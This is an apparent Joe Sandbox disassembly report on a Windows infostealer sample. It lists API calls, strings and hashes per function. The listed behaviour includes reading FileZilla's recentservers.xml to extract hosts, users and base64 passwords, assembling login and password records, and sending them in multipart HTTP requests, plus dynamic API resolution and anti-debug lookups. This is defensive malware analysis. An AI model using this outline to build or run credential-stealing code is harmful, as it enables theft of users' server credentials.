lstrcat.KERNEL32(?,02F654D0), ref: 004073C1
lstrcat.KERNEL32(?,02F654E8), ref: 004073D4
lstrcat.KERNEL32(?,02F664A8), ref: 004073E8
lstrcat.KERNEL32(?,?), ref: 004073FC
lstrcat.KERNEL32(?,?), ref: 00407410
lstrcat.KERNEL32(?,?), ref: 00407424
lstrcat.KERNEL32(?,02F653C8), ref: 00407438
lstrcat.KERNEL32(?,02F654B8), ref: 0040744B
lstrcat.KERNEL32(?,02F654D0), ref: 0040745F
lstrcat.KERNEL32(?,02F654E8), ref: 00407473
lstrcat.KERNEL32(?,02F66510), ref: 00407486
lstrcat.KERNEL32(?,?), ref: 0040749A
lstrcat.KERNEL32(?,?), ref: 004074AE
lstrcat.KERNEL32(?,?), ref: 004074C2
lstrcat.KERNEL32(?,02F653C8), ref: 004074D6
lstrcat.KERNEL32(?,02F654B8), ref: 004074EA
lstrcat.KERNEL32(?,02F654D0), ref: 004074FD
lstrcat.KERNEL32(?,02F654E8), ref: 00407511
lstrcat.KERNEL32(?,02F66578), ref: 00407525
lstrcat.KERNEL32(?,?), ref: 00407539
lstrcat.KERNEL32(?,?), ref: 0040754D
lstrcat.KERNEL32(?,?), ref: 00407561
lstrcat.KERNEL32(?,02F653C8), ref: 00407574
lstrcat.KERNEL32(?,02F654B8), ref: 00407588
lstrcat.KERNEL32(?,02F654D0), ref: 0040759C
lstrcat.KERNEL32(?,02F654E8), ref: 004075AF
lstrcat.KERNEL32(?,02F665E0), ref: 004075C3
lstrcat.KERNEL32(?,?), ref: 004075D7
lstrcat.KERNEL32(?,?), ref: 004075EB
lstrcat.KERNEL32(?,?), ref: 004075FF
lstrcat.KERNEL32(?,02F653C8), ref: 00407613
lstrcat.KERNEL32(?,02F654B8), ref: 00407626
lstrcat.KERNEL32(?,02F654D0), ref: 0040763A
lstrcat.KERNEL32(?,02F654E8), ref: 0040764E

Part of subcall function 00406FA0: lstrcat.KERNEL32(2F6A5020,0041DEB8), ref: 00406FD6
Part of subcall function 00406FA0: lstrcat.KERNEL32(2F6A5020,00000000), ref: 00407018
Part of subcall function 00406FA0: lstrcat.KERNEL32(2F6A5020, : ), ref: 0040702A
Part of subcall function 00406FA0: lstrcat.KERNEL32(2F6A5020,00000000), ref: 0040705F
Part of subcall function 00406FA0: lstrcat.KERNEL32(2F6A5020,0041DEC0), ref: 00407070
Part of subcall function 00406FA0: lstrcat.KERNEL32(2F6A5020,00000000), ref: 004070A3
Part of subcall function 00406FA0: lstrcat.KERNEL32(2F6A5020,0041DEC4), ref: 004070BD
Part of subcall function 00406FA0: task.LIBCPMTD ref: 004070CB

lstrcat.KERNEL32(?,02F61C20), ref: 004077DB
lstrcat.KERNEL32(?,02F65BB0), ref: 004077EE
lstrlen.KERNEL32(2F6A5020), ref: 004077FB
lstrlen.KERNEL32(2F6A5020), ref: 0040780B

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02F61B90), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$Heap$AllocateInternetOpenProcesslstrcpytask
String ID:
API String ID: 3958002797-0
Opcode ID: b5bdf3d81c3e92e67f42610897bd79d19ef9b07276fcf033d1f54a95a78769b8
Instruction ID: 3e78b0701875fb024adfa953bd7607f570b92d72e3b87f8e208063dda3fe5bd2
Opcode Fuzzy Hash: b5bdf3d81c3e92e67f42610897bd79d19ef9b07276fcf033d1f54a95a78769b8
Instruction Fuzzy Hash: D33234B6D01A14ABCB35EBA0DC89DDE737DAB48704F404699B20A66090DF78E7C5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA90 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

strtok_s.MSVCRT ref: 0040EB5B
GetProcessHeap.KERNEL32(00000000,000F423F,0041D77A,0041D777,0041D776,0041D773), ref: 0040EBA2
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EBA9
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040EBC5
lstrlen.KERNEL32(00000000), ref: 0040EBD3

Part of subcall function 00414FA0: malloc.MSVCRT ref: 00414FA8
Part of subcall function 00414FA0: strncpy.MSVCRT ref: 00414FC3

StrStrA.SHLWAPI(00000000,<Port>), ref: 0040EC0F
lstrlen.KERNEL32(00000000), ref: 0040EC1D
StrStrA.SHLWAPI(00000000,<User>), ref: 0040EC59
lstrlen.KERNEL32(00000000), ref: 0040EC67
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040ECA3
lstrlen.KERNEL32(00000000), ref: 0040ECB5
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040ED42
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED5A
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED72
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED8A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 0040EDA2
lstrcat.KERNEL32(?,profile: null), ref: 0040EDB1
lstrcat.KERNEL32(?,url: ), ref: 0040EDC0
lstrcat.KERNEL32(?,00000000), ref: 0040EDD3
lstrcat.KERNEL32(?,0041DD34), ref: 0040EDE2
lstrcat.KERNEL32(?,00000000), ref: 0040EDF5
lstrcat.KERNEL32(?,0041DD38), ref: 0040EE04
lstrcat.KERNEL32(?,login: ), ref: 0040EE13
lstrcat.KERNEL32(?,00000000), ref: 0040EE26
lstrcat.KERNEL32(?,0041DD44), ref: 0040EE35
lstrcat.KERNEL32(?,password: ), ref: 0040EE44
lstrcat.KERNEL32(?,00000000), ref: 0040EE57
lstrcat.KERNEL32(?,0041DD54), ref: 0040EE66
lstrcat.KERNEL32(?,0041DD58), ref: 0040EE75
strtok_s.MSVCRT ref: 0040EEB9
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EECE
memset.MSVCRT ref: 0040EF17

Strings

\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040EAE4
<Host>, xrefs: 0040EBBC
url: , xrefs: 0040EDB7
<User>, xrefs: 0040EC50
login: , xrefs: 0040EE0A
password: , xrefs: 0040EE3B
profile: null, xrefs: 0040EDA8
browser: FileZilla, xrefs: 0040ED99
<Port>, xrefs: 0040EC06
<Pass encoding="base64">, xrefs: 0040EC9A

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$ChangeCloseCreateFindFolderFreeNotificationPathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1266801029-555421843
Opcode ID: 77b85b58d8f0edf8d244f222085a076d4fa4c57e7be74b854093ff4431b00f64
Instruction ID: d9186ee441f73b04c887f2efee86d04259a2264df0fa853aa1509dbc15227f06
Opcode Fuzzy Hash: 77b85b58d8f0edf8d244f222085a076d4fa4c57e7be74b854093ff4431b00f64
Instruction Fuzzy Hash: 3FD174B5D00208ABCB14EBF1DD56EEE7739AF44304F50851EF106B6095DF38AA85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00415ED0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,02F46B38), ref: 00415F11
GetProcAddress.KERNEL32(74DD0000,02F614B0), ref: 00415F2A
GetProcAddress.KERNEL32(74DD0000,02F61750), ref: 00415F42
GetProcAddress.KERNEL32(74DD0000,02F61648), ref: 00415F5A
GetProcAddress.KERNEL32(74DD0000,02F616D8), ref: 00415F73
GetProcAddress.KERNEL32(74DD0000,02F60C18), ref: 00415F8B
GetProcAddress.KERNEL32(74DD0000,02F608B0), ref: 00415FA3
GetProcAddress.KERNEL32(74DD0000,02F60650), ref: 00415FBC
GetProcAddress.KERNEL32(74DD0000,02F61720), ref: 00415FD4
GetProcAddress.KERNEL32(74DD0000,02F61708), ref: 00415FEC
GetProcAddress.KERNEL32(74DD0000,02F61678), ref: 00416005
GetProcAddress.KERNEL32(74DD0000,02F61600), ref: 0041601D
GetProcAddress.KERNEL32(74DD0000,02F60950), ref: 00416035
GetProcAddress.KERNEL32(74DD0000,02F61618), ref: 0041604E
GetProcAddress.KERNEL32(74DD0000,02F61630), ref: 00416066
GetProcAddress.KERNEL32(74DD0000,02F608D0), ref: 0041607E
GetProcAddress.KERNEL32(74DD0000,02F614C8), ref: 00416097
GetProcAddress.KERNEL32(74DD0000,02F61738), ref: 004160AF
GetProcAddress.KERNEL32(74DD0000,02F60710), ref: 004160C7
GetProcAddress.KERNEL32(74DD0000,02F61498), ref: 004160E0
GetProcAddress.KERNEL32(74DD0000,02F60610), ref: 004160F8
LoadLibraryA.KERNEL32(02F61660,?,004136C0), ref: 0041610A
LoadLibraryA.KERNEL32(02F614F8,?,004136C0), ref: 0041611B
LoadLibraryA.KERNEL32(02F614E0,?,004136C0), ref: 0041612D
LoadLibraryA.KERNEL32(02F61528,?,004136C0), ref: 0041613F
LoadLibraryA.KERNEL32(02F61510,?,004136C0), ref: 00416150
GetProcAddress.KERNEL32(75A70000,02F615E8), ref: 00416172
GetProcAddress.KERNEL32(75290000,02F615B8), ref: 00416193
GetProcAddress.KERNEL32(75290000,02F61768), ref: 004161AB
GetProcAddress.KERNEL32(75BD0000,02F61780), ref: 004161CD
GetProcAddress.KERNEL32(75450000,02F60630), ref: 004161EE
GetProcAddress.KERNEL32(76E90000,02F60C28), ref: 0041620F
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00416226

Strings

NtQueryInformationProcess, xrefs: 0041621A

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction ID: 1024ce913f91588aaf476b7e35ab3ad31cc185c195c2877b0ef9f81f7e935ec9
Opcode Fuzzy Hash: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction Fuzzy Hash: 4CA16FB5910E10AFC374DFA8FE88A1637BBBBCC3117116519A60AC72A0DF759482CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404DC0 Relevance: 54.8, APIs: 22, Strings: 9, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

lstrlen.KERNEL32(00000000), ref: 00404E4A

Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
StrCmpCA.SHLWAPI(?,02F61B90), ref: 00404ED9
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
HttpOpenRequestA.WININET(00000000,02F61B60,?,02F66870,00000000,00000000,00400100,00000000), ref: 00405058

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,02F61BD0,00000000,?,02F41E78,00000000,?,0041E098,00000000,?,00410996), ref: 004053EB
lstrlen.KERNEL32(00000000), ref: 004053FF
GetProcessHeap.KERNEL32(00000000,?), ref: 00405410
HeapAlloc.KERNEL32(00000000), ref: 00405417
lstrlen.KERNEL32(00000000), ref: 0040542C
memcpy.MSVCRT ref: 00405443
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040545D
memcpy.MSVCRT ref: 0040546A
lstrlen.KERNEL32(00000000), ref: 0040547C
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405495
memcpy.MSVCRT ref: 004054A5
lstrlen.KERNEL32(00000000,?,?), ref: 004054C2
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004054D6
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405501
InternetCloseHandle.WININET(00000000), ref: 00405565
InternetCloseHandle.WININET(00000000), ref: 00405572
InternetCloseHandle.WININET(00000000), ref: 0040557C

Strings

------, xrefs: 004052EF
", xrefs: 00405278
------, xrefs: 00404F4B
--, xrefs: 00404F34
", xrefs: 00405136
------, xrefs: 004051AD
J&f, xrefs: 00405029
", xrefs: 004053BA
------, xrefs: 0040506B

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------$J&f
API String ID: 2633831070-3705675087
Opcode ID: 74493234c483f3658d59d402a436d2929cc6b9c7c557567d206e6107d0e6baac
Instruction ID: 3b2782edbf40cedd773c0650a07a319f3ed05c79c24ff2984dda7e87394ba47c
Opcode Fuzzy Hash: 74493234c483f3658d59d402a436d2929cc6b9c7c557567d206e6107d0e6baac
Instruction Fuzzy Hash: F4324375920218ABCB14EBA1DC51FEEB779BF54704F40419EF10662091DF38AB89CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405610 Relevance: 47.7, APIs: 19, Strings: 8, Instructions: 493
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004056A8
StrCmpCA.SHLWAPI(?,02F61B90), ref: 004056C3
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405843
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,02F61BE0,00000000,?,02F41E78,00000000,?,0041E0D8), ref: 00405B1E
lstrlen.KERNEL32(00000000), ref: 00405B2F
GetProcessHeap.KERNEL32(00000000,?), ref: 00405B40
HeapAlloc.KERNEL32(00000000), ref: 00405B47
lstrlen.KERNEL32(00000000), ref: 00405B5C
memcpy.MSVCRT ref: 00405B73
lstrlen.KERNEL32(00000000), ref: 00405B85
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405B9E
memcpy.MSVCRT ref: 00405BAB
lstrlen.KERNEL32(00000000,?,?), ref: 00405BC8
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405BDC
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405BF9
InternetCloseHandle.WININET(00000000), ref: 00405C5D
InternetCloseHandle.WININET(00000000), ref: 00405C6A
HttpOpenRequestA.WININET(00000000,02F61B60,?,02F66870,00000000,00000000,00400100,00000000), ref: 004058A8

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

InternetCloseHandle.WININET(00000000), ref: 00405C74

Strings

------, xrefs: 004058BB
-A, xrefs: 00405620, 00405D27, 00405623
J&f, xrefs: 00405878
------, xrefs: 00405746
", xrefs: 00405AC6
-A, xrefs: 0040566F, 00405D14, 004056F7, 00405700, 0040576E, 004057E5, 004058E3, 00405A24, 00405771, 004057E8, 004058E6, 00405A27
", xrefs: 00405985
------, xrefs: 004059FC

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------$-A$-A$J&f
API String ID: 148854478-1022722094
Opcode ID: 484756e9e2b122063d4cfba4e0ce3c57df42427b15e0e70858559e4d979600cf
Instruction ID: 38116f3ce93ed53bffdba46f35b2307ef6cb7c9f678a3856a9fc947e80efe624
Opcode Fuzzy Hash: 484756e9e2b122063d4cfba4e0ce3c57df42427b15e0e70858559e4d979600cf
Instruction Fuzzy Hash: A0125175920218AACB14EBA1DC95FDEB739BF14304F41429EF10A63091DF386B89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A030 Relevance: 32.0, APIs: 21, Instructions: 494
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A362
RtlAllocateHeap.NTDLL(00000000), ref: 0040A369
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A14A

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02F60C98,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrcat.KERNEL32(?,00000000), ref: 0040A4AA
lstrcat.KERNEL32(?,0041DA80), ref: 0040A4B9
lstrcat.KERNEL32(?,00000000), ref: 0040A4CC
lstrcat.KERNEL32(?,0041DA84), ref: 0040A4DB
lstrcat.KERNEL32(?,00000000), ref: 0040A4EE
lstrcat.KERNEL32(?,0041DA88), ref: 0040A4FD
lstrcat.KERNEL32(?,00000000), ref: 0040A510
lstrcat.KERNEL32(?,0041DA8C), ref: 0040A51F
lstrcat.KERNEL32(?,00000000), ref: 0040A532
lstrcat.KERNEL32(?,0041DA90), ref: 0040A541
lstrcat.KERNEL32(?,00000000), ref: 0040A554
lstrcat.KERNEL32(?,0041DA94), ref: 0040A563

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrcat.KERNEL32(?,00000000), ref: 0040A5AC
lstrcat.KERNEL32(?,0041DA98), ref: 0040A5C6
lstrlen.KERNEL32(?), ref: 0040A605
lstrlen.KERNEL32(?), ref: 0040A614
memset.MSVCRT ref: 0040A65D

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

DeleteFileA.KERNEL32(00000000), ref: 0040A689

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
String ID:
API String ID: 2228671196-0
Opcode ID: f038a46a859a89ab1135c2a40355bd4fe71db6198e962a5605bbf1e7f4cfc534
Instruction ID: c7be15c6cc4abab23e8f274795eadccbdda502ec8511485448b77053ecd04baf
Opcode Fuzzy Hash: f038a46a859a89ab1135c2a40355bd4fe71db6198e962a5605bbf1e7f4cfc534
Instruction Fuzzy Hash: B0029475900208ABCB14EBA1DC96EEE773ABF14305F11415EF507B6091DF38AE85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C640 Relevance: 31.9, APIs: 21, Instructions: 374
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02F41CF8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6D3
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040C817
RtlAllocateHeap.NTDLL(00000000), ref: 0040C81E
lstrcat.KERNEL32(?,00000000), ref: 0040C958
lstrcat.KERNEL32(?,0041DBD8), ref: 0040C967
lstrcat.KERNEL32(?,00000000), ref: 0040C97A
lstrcat.KERNEL32(?,0041DBDC), ref: 0040C989
lstrcat.KERNEL32(?,00000000), ref: 0040C99C
lstrcat.KERNEL32(?,0041DBE0), ref: 0040C9AB
lstrcat.KERNEL32(?,00000000), ref: 0040C9BE
lstrcat.KERNEL32(?,0041DBE4), ref: 0040C9CD
lstrcat.KERNEL32(?,00000000), ref: 0040C9E0
lstrcat.KERNEL32(?,0041DBE8), ref: 0040C9EF
lstrcat.KERNEL32(?,00000000), ref: 0040CA02
lstrcat.KERNEL32(?,0041DBEC), ref: 0040CA11
lstrcat.KERNEL32(?,00000000), ref: 0040CA24
lstrcat.KERNEL32(?,0041DBF0), ref: 0040CA33

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02F60C98,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

lstrlen.KERNEL32(?), ref: 0040CA7A
lstrlen.KERNEL32(?), ref: 0040CA89
memset.MSVCRT ref: 0040CAD2

Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F

DeleteFileA.KERNEL32(00000000), ref: 0040CAFE

Memory Dump Source

Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u42w.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: 10f8d54376e3b5367ee62ddff68a19014b5296cf016c591a8fccde4daf0e2bb0
